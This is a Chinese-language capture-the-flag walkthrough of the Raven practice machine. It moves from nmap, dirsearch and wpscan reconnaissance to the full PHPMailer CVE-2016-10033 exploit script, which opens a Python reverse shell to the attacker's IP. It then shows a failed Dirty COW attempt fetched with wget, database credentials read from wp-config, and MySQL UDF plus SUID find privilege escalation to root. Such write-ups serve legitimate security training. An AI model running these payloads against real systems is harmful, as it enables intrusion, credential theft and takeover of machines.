信息收集
主机发现
nmap -sP 192.168.192.0/24
端口扫描
nmap -A -p- 192.168.192.195
开启端口
22 80 111 42989
访问80端口
目录遍历
dirsearch -u http://192.168.192.195
发现敏感目录
/wp-login.php /vendor /wordpress /wordpress/wp-content/uploads/
找到flag1
http://192.168.192.195/vendor/PATH
因为该站为wordpress搭建,所以使用wpscan工具进行扫描
扫描用户
wpscan -u http://192.168.192.195/wordpress -e u
找到用户
michael steven
渗透过程
使用searchsploit搜索phpmailer
使用 40974.py文件
searchsploit -m 40974
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
# target = 'http://localhost:8080'
target = 'http://raven.local/'
vuln = "/contact.php"
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.192.1\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
# payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
fields={'action': 'submit',
'name': payload,
# 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
# headers={'User-Agent': 'curl/7.47.0',
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
# print('[+] ExPLoITeD ' + target)
print('[+] ExPLoITeD ' + target + backdoor)
开启监听端口
nc -lvp 4444
运行脚本,成功反弹shell
获取到www用户权限,切换一下shell
python -c 'import pty; pty.spawn("/bin/bash")'
查看下内核版本
uname -a
尝试脏牛漏洞提权
searchsploit cow ------------------------------------------------------------------------------------------------------------------------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------- Carel pCOWeb < B1.2.1 - Credentials Disclosure | hardware/webapps/46898.txt Carel pCOWeb < B1.2.1 - Cross-Site Scripting | hardware/webapps/46897.txt Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal | hardware/webapps/50986.txt CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal | java/webapps/35781.txt CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting | hardware/remote/35779.txt coWiki - 'index.php' Cross-Site Scripting | php/webapps/30515.txt COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow | windows/local/8780.php Jcow 4.2.1 - Local File Inclusion | php/webapps/17297.txt Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit) | php/webapps/17722.rb jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow | windows/local/4751.pl JetAudio 7.5.3 COWON Media Center - '.wav' Crash | windows/dos/9139.pl Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c Mailcow 0.14 - Cross-Site Request Forgery | php/webapps/42004.txt phpCow 2.1 - File Inclusion | php/webapps/15447.txt Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion | php/webapps/2896.py -------------------------------------------------------------------------------------------------------------------------------------------------
这里使用linux/local/40839.c
进行尝试
自己主机开启一个http服务
sudo python3 -m http.server -d /usr/share/exploitdb/exploits/linux/local 80
cd 到/tmp目录下,使用wget下载exp文件
cd /tmp wget http://172.24.71.180/40839.c gcc -pthread 40839.c -o 40839 -lcrypt ./40839
查看是否添加了用户
cat /etc/passwd
发现并未添加,提权失败
查看www目录,发现目录下存在flag2
flag2{6a8ed560f0b5358ecf844108048eb337}
进入/var/www/html/wordpress
目录
查看wp-config.php文件,读取到数据库密码root : R@v3nSecurity
mysql udf提权
获取exp
searchsploit mysql udf ------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------- --------------------------------- MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1) | linux/local/1181.c MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) | linux/local/1518.c MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution | windows/remote/3274.txt MySQL 4/5/6 - UDF for Command Execution | linux/local/7856.txt ------------------------------------------------------------------------- ---------------------------------
编译exp
searchsploit -p linux/local/1518.c gcc -g -c 1518.c gcc -g -shared -o 1518.so 1518.o -lc
将1518.so 文件上传到/tmp 目录下。
进入到数据库
mysql -uroot -pR@v3nSecurity
create database fredg0n; use fredg0n; create table fredg0n(line blob); insert into fredg0nvalues(load_file('/tmp/1518.so')); select * from fredg0n into dumpfile '/usr/lib/mysql/plugin/udf.so'; create function do_system returns integer soname 'udf.so'; select do_system('chmod u+s /usr/bin/find');
suid提权
ls -alh /usr/bin/find mkdir fredg0n find fredg0n -exec '/bin/sh' \;
提权成功,拿到flag4